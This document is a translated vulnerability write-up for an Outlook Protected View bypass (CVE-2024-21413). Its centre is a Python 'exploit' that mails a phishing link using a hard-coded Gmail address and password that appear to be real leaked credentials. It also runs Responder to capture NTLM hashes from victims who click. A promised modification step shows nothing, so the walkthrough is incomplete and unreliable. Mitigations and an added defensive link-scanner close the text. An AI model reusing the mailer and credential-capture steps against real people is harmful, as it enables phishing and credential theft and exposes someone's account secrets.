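Preface
Microsoft Office Outlook is one of the components of the Microsoft Office suite. It extends the functionality of Outlook Express, which ships with Windows.
Outlook has many features: it can be used to send and receive email, manage contact information, keep a journal, schedule appointments, and assign tasks.
I. Vulnerability Description
Using the Preview Pane as the attack vector, an attacker crafts a malicious link that bypasses the Protected View protocol, so that the file bypasses Office Protected View and is opened in editing mode.
An attacker who successfully exploits this vulnerability can obtain local NTLM credential information and execute arbitrary code remotely on the target computer.
Used together with other vulnerabilities (CVE-2022-30190, CVE-2023-21716), it can achieve remote code execution!
II. Affected Versions
1. Microsoft Office 2016 (64-bit edition)
2. Microsoft Office 2016 (32-bit edition)
3. Microsoft Office LTSC 2021 for 32-bit editions
4. Microsoft Office LTSC 2021 for 64-bit editions
5. Microsoft 365 Apps for Enterprise for 64-bit Systems
6. Microsoft 365 Apps for Enterprise for 32-bit Systems
7. Microsoft Office 2019 for 64-bit editions
8. Microsoft Office 2019 for 32-bit editions
III. Vulnerability Details
The exploit (EXP) is as follows: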
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import os


# Define some color codes for terminal output
class colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


def print_header():
    print(f"{colors.HEADER}{colors.BOLD}{'='*80}")
    print(f"{colors.OKBLUE}{colors.BOLD}Email Sending Script{colors.ENDC} {colors.ENDC}CVE-2024-21413{colors.BOLD} Developed by https://github.com/ThemeHackers")
    print(f"{colors.HEADER}{'='*80}{colors.ENDC}")


def send_email():
    print_header()
    # Sender's email address and password (hard-coded in this script)
    sender_email = 'ah3112651@gmail.com'
    sender_password = 'pnsbkvkxwfgwjueu'
    # Get user input for receiver's email address
    receiver_email = input(f"{colors.OKGREEN}Enter the recipient's email address: {colors.ENDC}")
    # Create a new message object
    msg = MIMEMultipart()
    # Add sender, receiver, and subject to the message
    msg['From'] = sender_email
    msg['To'] = receiver_email
    msg['Subject'] = input(f"{colors.OKGREEN}Enter email subject: {colors.ENDC}")
    # Ask if user wants to add a link attachment
    add_attachment = input(f"{colors.WARNING}Do you want to add a link attachment? (yes/no): {colors.ENDC}").lower()
    if add_attachment == 'yes':
        link_content = input(f"{colors.OKCYAN}Enter the URL: {colors.ENDC}").strip()
        # Create HTML content with link
        html_content = f"""\
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {{
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
        }}
        .container {{
            max-width: 600px;
            margin: 0 auto;
            background-color: #ffffff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }}
        h1 {{
            color: #333333;
            font-size: 24px;
            margin-bottom: 20px;
        }}
        p {{
            color: #555555;
            font-size: 16px;
            line-height: 1.5;
        }}
        a {{
            color: #007bff;
            text-decoration: none;
            font-weight: bold;
        }}
        a:hover {{
            text-decoration: underline;
        }}
    </style>
</head>
<body>
    <div class="container">
        <h1>Hello!</h1>
        <p>Click the link below to access the content:</p>
        <p><a href="{link_content}">Click here to access the link</a></p>
    </div>
</body>
</html>
"""
        # Attach HTML content to the email (only built when a link was supplied)
        msg.attach(MIMEText(html_content, 'html'))
    # Connect to SMTP server and send email
    try:
        with smtplib.SMTP('smtp.gmail.com', 587) as server:
            server.starttls()
            server.login(sender_email, sender_password)
            server.send_message(msg)
        print(f"{colors.OKGREEN}Email sent successfully.{colors.ENDC}")
    except Exception as e:
        print(f"{colors.FAIL}Failed to send email: {e}{colors.ENDC}")


if __name__ == "__main__":
    os.system('clear')  # Clears the terminal for a cleaner look
    send_email()
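The reproduction environment is as follows.
Start a Responder instance locally:
responder -I eth0
Modify the script as follows:
Pay attention to the format.
Run the script and wait for the mailbox to receive the message.
Click the link in the email body; the server information is captured locally.
IV. Mitigation
1. Apply the latest security updates provided by Microsoft.
2. Make sure Outlook and all related Office applications are updated to the latest version.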
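Added example (not part of the original post or the PoC author's code): a defensive check that complements the mitigations above by flagging links in HTML mail that point at a remote file share, the kind of link that makes the client authenticate to a listener such as Responder. It assumes the crafted link uses the file: scheme or a UNC path, which the post does not show; the function names and the sample message are constructed for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlsplit

class LinkCollector(HTMLParser):
    """Collect href/src values from an HTML mail body."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        self.urls += [v.strip() for k, v in attrs if k in ("href", "src") and v]

def is_remote_file_link(url):
    """True for UNC paths and file: URLs that name a remote host (assumed link shape)."""
    if url.startswith("\\\\"):                       # bare UNC: \\host\share\doc
        return True
    try:
        parts = urlsplit(url.replace("\\", "/"))
    except ValueError:                               # malformed URL, nothing to flag
        return False
    if parts.scheme.lower() != "file":
        return False
    remote_host = parts.netloc.lower() not in ("", "localhost")
    # file://host/share/... or a UNC path embedded after file:///
    return remote_host or parts.path.startswith("//")

def suspicious_links(raw_message):
    """Return remote-file links found in the text/html parts of a raw message."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            collector = LinkCollector()
            collector.feed(part.get_content())
            hits += [u for u in collector.urls if is_remote_file_link(u)]
    return hits

# Constructed sample message (not taken from the post).
SAMPLE = (
    b"From: a@example.com\r\nTo: b@example.com\r\nSubject: test\r\n"
    b"MIME-Version: 1.0\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"
    b'<p><a href="https://example.com/report">ok</a></p>'
    b'<p><a href="file://files.example.net/share/doc.rtf">doc</a></p>'
)

if __name__ == "__main__":
    print(suspicious_links(SAMPLE))
```

A mail gateway or mailbox sweep can quarantine or rewrite messages for which suspicious_links returns a non-empty list; blocking outbound SMB (TCP 445) at the perimeter covers links this check misses.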